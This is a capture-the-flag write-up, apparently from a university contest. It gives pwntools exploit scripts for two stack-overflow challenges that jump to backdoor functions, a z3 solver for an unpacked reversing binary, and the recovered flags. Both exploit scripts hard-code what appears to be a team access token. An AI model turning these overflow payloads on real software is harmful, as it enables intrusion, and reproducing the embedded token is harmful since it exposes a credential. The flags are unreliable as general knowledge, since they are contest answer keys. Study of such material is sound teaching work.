pwn-login
登录功能，随便输入一定长度的字符串 fuzz 一下，然后会发送 core 数据，接收后保存为本地可执行文件。
后门函数和栈溢出,直接打就行了
# Solve script for the pwn-login challenge.  With debug=0 it talks to the
# remote contest instance; with debug=1 it runs the local './pwn' binary.
from pwn import *
from pwn import u64,u32,p64,p32
from ctypes import *
# NOTE(review): ctypes, libcfind, LibcSearcher and base64 are imported but not
# used anywhere in this script.
from libcfind import *
from LibcSearcher import *
import base64
import sys
# log_level='debug' makes pwntools echo every byte sent and received to the
# terminal, including the access token sent below.
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
debug = 0
if debug:
    p = process('./pwn')
    elf = ELF('./pwn')
else:
    p = remote('prob04.contest.pku.edu.cn', 10004)
# Short-hand wrappers around the pwntools tube API.
s = lambda data: p.send(data)
sa = lambda text, data: p.sendafter(text, data)
sl = lambda data: p.sendline(data)
sla = lambda text, data: p.sendlineafter(text, data)
r = lambda num=4096: p.recv(num)
rl = lambda text: p.recvuntil(text)
# pr() decodes as UTF-8 by default and raises UnicodeDecodeError on other bytes.
pr = lambda num=4096: sys.stdout.write(p.recv(num).decode())
inter = lambda: p.interactive()
# Leak helpers: read up to a marker byte and zero-extend the tail to 4/8 bytes.
# None of them are used in this script.
l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00'))
int16 = lambda data: int(data, 16)
# The parameter named s shadows the s() helper only inside this lambda.
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
rl("Please input your token: ")
# Per-team contest access token, hard-coded.  NOTE(review): a credential
# published in a writeup should be treated as exposed and rotated.
sl('557:MEYCIQC2WA6edSSGVo8AOQCj3TXXSSM3owCagj6bHEkuZWg7CAIhAMi6iZUaOsH2KoK-UTxeC00-TSWHvE-3uXF33KxmiGq2')
# Address of the backdoor function in the (non-PIE) binary, taken from the
# challenge analysis above.
backdoor = 0x401276
rl("Username: ")
name = 'admin'
sl(name)
rl("Password: ")
# 0x98 bytes of NUL padding followed by the little-endian 8-byte value
# backdoor+5; the page states the binary has a stack overflow and a backdoor
# function.  Why the +5 offset is used instead of the function start is not
# explained on the page.
password = b'\x00'*0x98 + p64(backdoor+5)
sl(password)
inter()
pwn-easypwn
第二处存在栈溢出，用 '\x00' 截断，溢出到后门函数
# Solve script for the pwn-easypwn challenge.  With debug=0 it talks to the
# remote contest instance; with debug=1 it runs the local './pwn' binary.
from pwn import *
from pwn import u64,u32,p64,p32
from ctypes import *
# NOTE(review): ctypes, libcfind, LibcSearcher and base64 are imported but not
# used anywhere in this script; elf is loaded but never read either.
from libcfind import *
from LibcSearcher import *
import base64
import sys
# log_level='debug' makes pwntools echo every byte sent and received to the
# terminal, including the access token sent below.
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
debug = 0
if debug:
    p = process('./pwn')
    elf = ELF('./pwn')
else:
    p = remote('prob07.contest.pku.edu.cn', 10007)
    elf = ELF('./pwn')
# Short-hand wrappers around the pwntools tube API.
s = lambda data: p.send(data)
sa = lambda text, data: p.sendafter(text, data)
sl = lambda data: p.sendline(data)
sla = lambda text, data: p.sendlineafter(text, data)
r = lambda num=4096: p.recv(num)
rl = lambda text: p.recvuntil(text)
# pr() decodes as UTF-8 by default and raises UnicodeDecodeError on other bytes.
pr = lambda num=4096: sys.stdout.write(p.recv(num).decode())
inter = lambda: p.interactive()
# Leak helpers: read up to a marker byte and zero-extend the tail to 4/8 bytes.
# None of them are used in this script.
l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00'))
int16 = lambda data: int(data, 16)
# The parameter named s shadows the s() helper only inside this lambda.
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
rl("Please input your token: ")
# Per-team contest access token, hard-coded.  NOTE(review): a credential
# published in a writeup should be treated as exposed and rotated.
sl('557:MEYCIQC2WA6edSSGVo8AOQCj3TXXSSM3owCagj6bHEkuZWg7CAIhAMi6iZUaOsH2KoK-UTxeC00-TSWHvE-3uXF33KxmiGq2')
rl("Enter your username: ")
# Username is sent with an explicit NUL terminator.
sl(b'root\x00')
rl("Enter the password: ")
# Password payload: a short marker string ending in \x00 (the page says the
# NUL truncation is what lets the second overflow reach the backdoor), padded
# with NUL to 0x38 bytes, then the little-endian 8-byte address 0x401177.
# Note it is sent with s() (no trailing newline), unlike the earlier inputs.
payload = b'!@#$%^&*()_+\x00'
payload = payload.ljust(0x38,b'\x00')
payload += p64(0x401177)
s(payload)
inter()
re-easyre
换表的base64编码。
解码一下就行
flag{B4se64_1s_s0_e4sy}
re-babyre
有UPX壳,用upx.exe -d babyre脱壳
四个part,对应的变换过程,Z3列公式就能直接解
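"""Solve script for the four flag parts of re-babyre (after UPX unpacking).

Part 1 is a plain addition; parts 2-4 invert the binary's bit-twiddling
checks with z3 on a 32-bit bit-vector.  Every part is printed as hex so it can
be pasted straight into the flag template.

Changes from the first draft: one z3 import instead of three, a shared solver
helper instead of three copies of the BitVec/Solver/check boilerplate, the
dead ``a1 = BitVec(...)`` after the first solve removed, and consistent
"vN = 0x..." / "No solution found" output for all three z3 parts (v7 used to
be printed as a raw z3 expression and v6 would have crashed with
``hex(None)`` on an unsat instance).
"""
from z3 import BitVec, Solver, sat

# Part 1: plain addition.  The sum (0xe3c6235c) fits in 32 bits, so no
# masking is needed to match the binary's 32-bit result.
v5 = 907301700 + 2914111512
print('v5 =', hex(v5))


def _solve_part(constraint, upper_bound=None):
    """Return the first 32-bit value for which ``constraint(a1)`` holds, or None.

    Args:
        constraint: callable taking the z3 ``BitVec`` and returning the z3
            boolean the binary checks for that part.
        upper_bound: optional inclusive bound asserted as ``a1 <= upper_bound``
            before the main constraint (z3py's ``<=`` on bit-vectors is the
            signed comparison).  Asserting it first keeps the same assertion
            order as the original script, so z3 returns the same model.

    Returns:
        The model value of ``a1`` as an ``int``, or ``None`` when unsat.
    """
    a1 = BitVec('a1', 32)
    solver = Solver()
    if upper_bound is not None:
        solver.add(a1 <= upper_bound)
    solver.add(constraint(a1))
    if solver.check() != sat:
        return None
    return solver.model()[a1].as_long()


def _report(label, value):
    """Print ``label = 0x...`` or a uniform not-found message for a part."""
    if value is None:
        print(label, "= No solution found")
    else:
        print(label, "=", hex(value))


def solve_a1():
    """Part 2: solve the first z3 check.  Kept under its original name.

    Returns:
        The satisfying 32-bit value, or ``None`` if z3 reports unsat.  This
        part has no range bound, matching the original.
    """
    return _solve_part(
        lambda a1: (a1 | 0x8E03BEC3) == (3 * (a1 & 0x71FC413C) - a1 - 1876131848)
    )


def solve_v7():
    """Part 3: second z3 check, bounded to a1 <= 0x10000000 like the original."""
    return _solve_part(
        lambda a1: 4 * ((~a1 & 0xA8453437) + 2 * ~(~a1 | 0xA8453437)) + -3 * (~a1 | 0xA8453437) + 3 * ~(a1 | 0xA8453437) - (-10 * (a1 & 0xA8453437) + (a1 ^ 0xA8453437)) == 551387557,
        upper_bound=0x10000000,
    )


def solve_v8():
    """Part 4: third z3 check, bounded to a1 <= 0x10000000 like the original."""
    return _solve_part(
        lambda a1: 11 * ~(a1 ^ 0xE33B67BD) + 4 * ~(~a1 | 0xE33B67BD) - (6 * (a1 & 0xE33B67BD) + 12 * ~(a1 | 0xE33B67BD)) + 3 * (a1 & 0xD2C7FC0C) + -5 * a1 - 2 * ~(a1 | 0xD2C7FC0C) + ~(a1 | 0x2D3803F3) + 4 * (a1 & 0x2D3803F3) - -2 * (a1 | 0x2D3803F3) == -837785892,
        upper_bound=0x10000000,
    )


v6 = solve_a1()
_report('v6', v6)
v7 = solve_v7()
_report('v7', v7)
v8 = solve_v8()
_report('v8', v8)
# Manual hex conversion of the decimal v7 value z3 printed on the author's run
# (0x4b1edf3); kept so the script's output is unchanged.
print(hex(78769651))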
替换对应part即可
flag{e3c6235c-05d9434d-04b1edf3-04034083}